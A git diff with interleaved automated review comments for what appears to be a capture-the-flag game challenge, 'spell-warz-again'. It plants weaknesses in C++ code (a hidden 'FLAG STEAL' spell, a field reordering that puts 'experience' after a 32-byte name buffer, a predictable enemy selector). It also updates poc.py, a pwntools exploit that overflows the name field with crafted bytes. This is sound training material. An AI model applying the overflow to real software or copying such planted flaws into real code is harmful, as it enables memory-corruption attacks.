diff --git a/lib/Battle.cpp b/lib/Battle.cpp
index 801c745..2681dd5 100644
--- a/lib/Battle.cpp
+++ b/lib/Battle.cpp
@@ -1,6 +1,7 @@
 #include "Battle.hpp"
 std::vector Battle::SPELL_BOOK = {
+ Spell("FLAG STEAL", Spell::TYPE_DESTRUCTION, 1000000, 1),
 Spell("Blazing Storm", Spell::TYPE_DESTRUCTION, 10, 5),
 Spell("Energy Arrow", Spell::TYPE_DESTRUCTION, 40, 10),
 Spell("Pyro Strike", Spell::TYPE_DESTRUCTION, 90, 15),
@@ -162,7 +163,7 @@ void Battle::start()
 UserInterface::print(buff);
 }
- choiceInt = (random() % (player2.getLevel() < SPELL_BOOK.size() ? player2.getLevel() : SPELL_BOOK.size())) + 1;
+ choiceInt = (this->turn % (player2.getLevel() < SPELL_BOOK.size() ? player2.getLevel() : SPELL_BOOK.size())) + 1;
 if (player2.canCastSpell(SPELL_BOOK.at(choiceInt)))
 {
 player2.castSpell(SPELL_BOOK.at(choiceInt), player1);
diff --git a/lib/Character.cpp b/lib/Character.cpp
index c8870ba..9bbe0c9 100644
--- a/lib/Character.cpp
+++ b/lib/Character.cpp
@@ -4,7 +4,7 @@
 #include "Character.hpp"
 const long Character::MAX_LVL = 1000000L;
-const long Character::MAX_EXP = 1000000000000L;
+const long Character::MAX_EXP = 0x1fffffffffffffff;
 Character::Character(const char *characterName, long characterLevel)
@@ -52,7 +52,7 @@ long Character::getLevel()
 long Character::getExperience()
 {
- if (experience > Character::MAX_LVL)
+ if (experience > Character::MAX_EXP)
 {
 exit(-1);
 }
diff --git a/lib/Character.hpp b/lib/Character.hpp
index a15a8ce..a513b29 100644
--- a/lib/Character.hpp
+++ b/lib/Character.hpp
@@ -12,8 +12,8 @@ protected:
 static const long MAX_EXP;
 char name[32];
- long level;
 long experience;
+ long level;
 long maxHP;
 long maxMP;
 long curHP;
diff --git a/lib/Spell.hpp b/lib/Spell.hpp
index bbc6de2..516f63f 100644
--- a/lib/Spell.hpp
+++ b/lib/Spell.hpp
@@ -4,7 +4,7 @@ class Spell
 {
 protected:
- char name[16];
+ char name[64];
 int type;
 int power;
 int cost;
diff --git a/poc.py b/poc.py
index de89014..c711370 100644
--- a/poc.py
+++ b/poc.py
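Review bot: The new `Spell("FLAG STEAL", Spell::TYPE_DESTRUCTION, 1000000, 1)` entry sits at index 0 of `SPELL_BOOK`, which the opponent's selector in the next hunk (`% … + 1`) never yields, so whether it is reachable at all depends entirely on the player-side menu validation, which is outside this diff. If index 0 is meant to stay out of normal play, state that at the table and enforce it in the choice parser, e.g. `// index 0 is reserved and must be rejected by the player menu; the enemy picks from 1..N`, so a later edit to the table or the selector does not change it silently. A power of 1000000 for a cost of 1 is also an outlier next to the 10/5, 40/10, 90/15 entries and deserves a one-line comment on why.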
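Review bot: `(this->turn % min(level, size)) + 1` produces values in 1..`SPELL_BOOK.size()`, so once `player2.getLevel()` reaches `SPELL_BOOK.size()` the index equal to the size is generated and `SPELL_BOOK.at(choiceInt)` throws `std::out_of_range`, which nothing in this hunk catches; the off-by-one was there with `random()` too, and switching to `this->turn` makes it deterministic instead of fixing it. Clamp the divisor so the result stays in 1..size-1: `choiceInt = (this->turn % std::min<std::size_t>(player2.getLevel(), SPELL_BOOK.size() - 1)) + 1;` (needs `<algorithm>`; it still assumes the level is at least 1 and the table has at least two entries, otherwise the modulus is zero). The type of `turn` is not visible here; if it is signed, the `%` against an unsigned `size()` also needs a cast or a comment. `Battle::start()` begins and ends outside this hunk.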
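Review bot: `0x1fffffffffffffff` has neither the `L` suffix nor a comment, unlike the `1000000L` two lines up; it is 2^61-1, which only fits a `long` on LP64 targets — on ILP32 or LLP64 (Windows) it converts to -1 with the usual modular conversion, and the `experience > MAX_EXP` guard in `getExperience()` can then never fire. Write the intent down, e.g. `const long Character::MAX_EXP = 0x1fffffffffffffffL; // 2^61-1, <why this bound>`, or, if the cap is simply "as large as the type allows", derive it from `std::numeric_limits<long>::max()` so it is right on every target. Why `MAX_LVL` is 10^6 while `MAX_EXP` is 2^61 is not obvious either; one comment on the relationship between the two would help the next reader.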
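Review bot: The corrected guard is one-sided: `experience` is a signed `long`, so a negative value (an underflow or an unchecked write elsewhere) passes `experience > Character::MAX_EXP` unnoticed, and the check sits in a getter that kills the process with `exit(-1)` and no message. Make the range check symmetric and say why it is fatal: `if (experience < 0 || experience > Character::MAX_EXP) { /* corrupted state: refuse to continue */ exit(-1); }`. `exit()` does not unwind the stack, so no automatic object in the callers is destroyed; if the game has a proper error path, prefer it over terminating from an accessor. `getExperience()` continues past this hunk.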
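Review bot: Swapping `long level;` and `long experience;` has no functional reason visible in the diff, but it changes the object layout: `experience` is now the field directly after the 32-byte `name` array, where `level` was before. If that ordering is deliberate (the poc.py in this same commit appears to send more than 32 bytes at the name prompt), record it in the header so a later tidy-up does not revert it, e.g. `// NOTE: field order is load-bearing for the challenge — name[32] is followed by experience, then level`. Independently of the order, whatever fills `name` (the constructor, not in this diff) should copy at most `sizeof(name) - 1` bytes and NUL-terminate unless overrunning it is the intended behaviour of the exercise.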
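Review bot: Growing `name` from 16 to 64 bytes does not by itself make the field safe: none of the `SPELL_BOOK` entries in this diff exceed 15 characters, so the reason for 64 is not visible, and the constructor that copies into it is outside the diff. If spell names must be fixed-size, document the limit and enforce it at the copy site (`strncpy` followed by `name[sizeof(name) - 1] = '\0'`), or make it `std::string name;` since `Spell` already lives in a `std::vector`; otherwise the larger buffer only moves the boundary. A one-line comment such as `// 64: longest supported spell name including the NUL` would save the next reader the search.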
@@ -1,9 +1,10 @@
-from pwn import *
+from pwn import process
-if __name__ == "__main__":
- p = process("./main")
+
+def poc0():
+ p = process("./spell-warz-again")
 print p.recvuntil(">")
- p.sendline(("A" * 16) + ("\xff\xff\xff\x0f\x01"))
+ p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01"))
 print p.recvuntil(">")
 p.sendline("y")
 print p.recvuntil(">")
@@ -12,7 +13,46 @@ if __name__ == "__main__":
 p.sendline("4")
 print p.recvuntil(">")
 p.sendline("y")
- for i in xrange(99):
+ for _ in xrange(10):
 print p.recvuntil(">")
- p.sendline("9")
+ p.sendline("100")
+ p.interactive()
+
+
+def poc1():
+ p = process("./spell-warz-again")
+ print p.recvuntil(">")
+ p.sendline("Leo")
+ print p.recvuntil(">")
+ p.sendline("y")
+ print p.recvuntil(">")
+ p.sendline("2")
+ print p.recvuntil(">")
+ p.sendline("4")
+ print p.recvuntil(">")
+ p.sendline("y")
+ print p.recvuntil(">")
+ p.sendline("0")
 p.interactive()
+
+
+def poc2():
+ p = process("./spell-warz-again")
+ print p.recvuntil(">")
+ p.sendline("__th3_w0rLd_D3str0Y3r__")
+ print p.recvuntil(">")
+ p.sendline("y")
+ print p.recvuntil(">")
+ p.sendline("2")
+ print p.recvuntil(">")
+ p.sendline("4")
+ print p.recvuntil(">")
+ p.sendline("y")
+ for _ in xrange(10):
+ print p.recvuntil(">")
+ p.sendline("100")
+ p.interactive()
+
+
+if __name__ == "__main__":
+ poc0()
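Review bot: Both poc.py hunks use Python 2-only syntax (`print` as a statement, `xrange`), so the script will not run under a current Python 3 interpreter; `print(...)` and `range` keep it working on either. The three functions repeat the same `recvuntil`/`sendline` menu walk line for line, so a small helper taking the list of answers would remove most of the duplication. `poc1` and `poc2` are defined but never called — the `__main__` block runs only `poc0` — and the binary path `./spell-warz-again` is repeated in each; a module-level constant avoids three edits when it changes.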